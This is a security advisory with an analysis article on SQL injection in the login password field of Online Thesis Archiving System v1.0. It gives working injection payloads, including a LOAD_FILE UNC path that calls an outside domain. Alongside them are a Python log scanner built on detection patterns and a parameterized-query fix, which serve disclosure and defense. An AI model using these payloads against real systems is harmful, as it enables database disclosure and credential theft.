Online Thesis Archiving System v1.0 - Multiple-SQLi

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: WebApps Language: SQL Published Date: 2023-06-14
## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.12.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The password parameter appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'` was submitted in the password parameter.

This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can dump all information from the database of this system, and then he can use it for dangerous and malicious purposes!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```text
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT (ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)

## Time spent:
01:15:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
                          nu11secur1ty <http://nu11secur1ty.com/>


Online Thesis Archiving System v1.0: A Critical SQL Injection Vulnerability Analysis

Security researchers have recently uncovered a high-critical vulnerability in the Online Thesis Archiving System v1.0, a widely distributed PHP-based open-source application. The system, originally developed by oretnom23, serves as a digital repository for academic theses, enabling users to upload, manage, and search scholarly work. Despite its intended utility, the application contains multiple SQL injection (SQLi) flaws that expose its database to remote exploitation.

Exploit Overview and Severity

The vulnerability was identified and reported by nu11secur1ty, a recognized cybersecurity researcher and exploit developer. The flaw is primarily located in the password parameter during authentication attempts, where user input is directly incorporated into SQL queries without proper sanitization or parameterization.

Attackers can leverage this weakness to execute arbitrary SQL commands, leading to full database disclosure, unauthorized access, and potential data exfiltration. The severity is classified as high-critical due to the ease of exploitation and the sensitive nature of the data stored—academic records, user credentials, and metadata associated with research projects.

Exploitation Techniques Demonstrated

Three distinct SQLi techniques were successfully demonstrated against the system, each confirming the presence of a vulnerable backend:

  • Boolean-based blind SQLi: Used to infer database state by observing response differences based on true/false conditions.
  • Error-based SQLi: Exploits MySQL error messages to extract information from the database.
  • Time-based blind SQLi: Leverages delays in query execution to confirm successful injection via timing differences.

Proof of Concept: SQL Injection Payloads

Below are the validated payloads used during testing, demonstrating how malicious input can be injected into the system:


Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr

Explanation: This payload appends a boolean condition (OR NOT 1404=1404) that always evaluates to FALSE. A blind probe like this is paired with an always-true counterpart; if the two produce different responses, the condition was evaluated by the database, indicating successful injection. The trailing -- comment discards the remainder of the original query, preventing syntax errors. Because nothing is returned directly, the attacker infers database logic one true/false answer at a time.


Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa

Explanation: This payload provokes a MySQL error through FLOOR(RAND(0)*2), which produces a duplicate key error when used as a GROUP BY key together with COUNT(*). The CONCAT wraps the value to be extracted between the hex marker strings 0x717a6b6b71 ('qzkkq') and 0x71766a7a71 ('qvjzq'); in this probe the inner SELECT (ELT(5476=5476,1)) is only a fixed test value. The duplicate-entry error message echoes the concatenated key, so the markers make the extracted value easy to locate in the error text, enabling attackers to reconstruct database content.


Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY

Explanation: This payload injects a SLEEP(15) command into the SQL query. If the database executes the command, the response will be delayed by 15 seconds—confirming that the injection was successful. This technique is particularly useful when no visible response changes occur, as timing differences provide a reliable detection method.

Advanced Attack: Load File via UNC Path

One of the most alarming aspects of this vulnerability is the ability to execute LOAD_FILE() via a UNC (Universal Naming Convention) path, as demonstrated in the following payload:


' + (select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock')) + '

Explanation: This payload attempts to exploit MySQL's LOAD_FILE() function, which allows reading files from the server's filesystem. By using a UNC path referencing an external domain (e.g., tupungerispanski.com), the attacker forces the database to attempt to access a remote file. The fact that the application interacts with this domain indicates that the SQL query was executed—proving that the system allows external file access via SQL injection.

Security Implications: This attack vector is extremely dangerous. If the server's MySQL instance allows LOAD_FILE() and the secure_file_priv setting is not restricted, attackers can:

  • Read sensitive configuration files (e.g., config.php, database.php).
  • Exfiltrate user passwords, session tokens, or encryption keys.
  • Read and manipulate uploaded thesis files stored in the system.

Even if the file doesn’t exist, the system’s interaction with the domain suggests that the injection was processed—making this a potent reconnaissance tool.
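As an added example (not part of the advisory or the project), a small log scanner that flags the payload patterns discussed above in logged POST bodies. The log format, the client addresses and the benign login line are constructed, and the signatures are keyed to these specific sqlmap-style payloads rather than being a general-purpose filter:

```python
import re
from urllib.parse import parse_qs

# Signatures keyed to the three payloads and the LOAD_FILE probe in this
# advisory; they are a starting point for alerting, not a general-purpose filter.
SIGNATURES = [
    ("boolean-blind",  re.compile(r"\bOR\s+NOT\s+\d+\s*=\s*\d+", re.I)),
    ("error-based",    re.compile(r"FLOOR\(\s*RAND\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
    ("schema-probe",   re.compile(r"INFORMATION_SCHEMA\.", re.I)),
    ("time-based",     re.compile(r"\bSLEEP\(\s*\d+\s*\)", re.I)),
    ("load-file-unc",  re.compile(r"LOAD_FILE\(\s*'\\\\", re.I)),
    ("sqlmap-comment", re.compile(r"--\s+[A-Za-z]{4}\s*$")),
]

# Constructed log format: timestamp, client IP, method, path, then the raw body.
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<ip>\S+) POST (?P<path>\S+) (?P<body>.*)$")

def classify_body(body):
    """Return the set of signature names matching any decoded POST parameter."""
    hits = set()
    for values in parse_qs(body, keep_blank_values=True).values():
        for value in values:
            hits.update(name for name, rx in SIGNATURES if rx.search(value))
    return hits

def scan_log(lines):
    """Return (client_ip, path, sorted hits) for every logged POST that matches."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            hits = classify_body(m["body"])
            if hits:
                alerts.append((m["ip"], m["path"], sorted(hits)))
    return alerts

# Constructed sample: one normal login followed by the advisory's payloads.
SAMPLE_LOG = [
    r"2023-06-12T10:00:01Z 198.51.100.7 POST /login.php email=alice%40example.org&password=Tr0ub4dor%263",
    r"2023-06-12T10:00:07Z 203.0.113.5 POST /login.php email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr",
    r"2023-06-12T10:00:09Z 203.0.113.5 POST /login.php email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa",
    r"2023-06-12T10:00:12Z 203.0.113.5 POST /login.php email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY",
    r"2023-06-12T10:00:20Z 203.0.113.5 POST /login.php email=x&password='+(select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'",
]

if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(ip, path, ", ".join(hits))
```

Body logging has to be enabled on the reverse proxy or application for this to see anything; the benign line is there to confirm the patterns do not fire on an ordinary login.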

Impact and Risk Assessment

Impact                                   Severity  Exploitability
Database disclosure                      High      Easy
Remote code execution (via file access)  High      Medium
Privilege escalation                     High      Medium
Data exfiltration                        High      Easy

Attackers can use the extracted data to perform credential stuffing, impersonate users, or launch targeted phishing campaigns. Academic institutions relying on this system may face reputational damage and regulatory violations under data protection laws (e.g., GDPR, HIPAA).

Recommendations and Mitigation

To address this vulnerability, the following measures are strongly recommended:

  • Input Validation: Always validate and sanitize user input—especially in authentication fields like email and password.
  • Parameterized Queries: Use prepared statements (e.g., PDO or mysqli_stmt) to prevent SQL injection.
  • Restrict File Access: Set secure_file_priv to NULL or a specific directory to prevent LOAD_FILE() usage.
  • Web Application Firewall (WAF): Deploy a WAF to detect and block SQL injection patterns in real time.
  • Regular Penetration Testing: Conduct periodic security audits, especially for open-source software used in sensitive environments.
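A minimal illustration of the Parameterized Queries recommendation, added here as an example rather than code from the project (which is PHP). It uses Python's sqlite3 with an assumed users table and query shape, and checks that the advisory's boolean-based probe no longer produces a true/false differential once the password is bound as a parameter:

```python
import sqlite3

# Constructed stand-in for the application's user table; the real schema and
# query shape are not on the page, so the column names here are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    conn.execute("INSERT INTO users (email, password) VALUES (?, ?)",
                 ("admin@example.org", "correct-horse-battery"))
    return conn

def login_concat(conn, email, password):
    # Vulnerable pattern: the values are spliced into the SQL text, so a quote,
    # a closing parenthesis and a '--' comment in the password rewrite the query.
    sql = "SELECT id FROM users WHERE (email = '%s' AND password = '%s')" % (email, password)
    return conn.execute(sql).fetchall()

def login_prepared(conn, email, password):
    # Hardened pattern: bound parameters are sent as values and never parsed as
    # SQL (the counterpart of PDO / mysqli_stmt placeholders in the PHP app).
    sql = "SELECT id FROM users WHERE (email = ? AND password = ?)"
    return conn.execute(sql, (email, password)).fetchall()

# The advisory's boolean-based probe (always-false branch) and an always-true
# counterpart; a login routine is injectable if the two yield different results.
EMAIL = "itvBGDRM@burpcollaborator.net"
PROBE_FALSE = "v7K!u1n!T7') OR NOT 1404=1404-- Eotr"
PROBE_TRUE = "v7K!u1n!T7') OR NOT 1404=1405-- Eotr"

def boolean_differential(login, conn):
    """True when the two probes change the row count, i.e. the injected
    condition was evaluated as SQL instead of being compared as a string."""
    return len(login(conn, EMAIL, PROBE_FALSE)) != len(login(conn, EMAIL, PROBE_TRUE))

if __name__ == "__main__":
    db = make_db()
    print("concatenated query injectable:", boolean_differential(login_concat, db))  # True
    print("prepared statement injectable:", boolean_differential(login_prepared, db))  # False
```

The same differential check makes a useful regression test after the fix: it should stay False for every login path that takes user input.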

Conclusion

The Online Thesis Archiving System v1.0 serves as a cautionary tale for developers and administrators. Despite being a free, open-source tool, it lacks fundamental security safeguards. The presence of multiple SQL injection vulnerabilities—especially one that enables remote file access via UNC paths—highlights the critical need for secure coding practices.

Security researchers like nu11se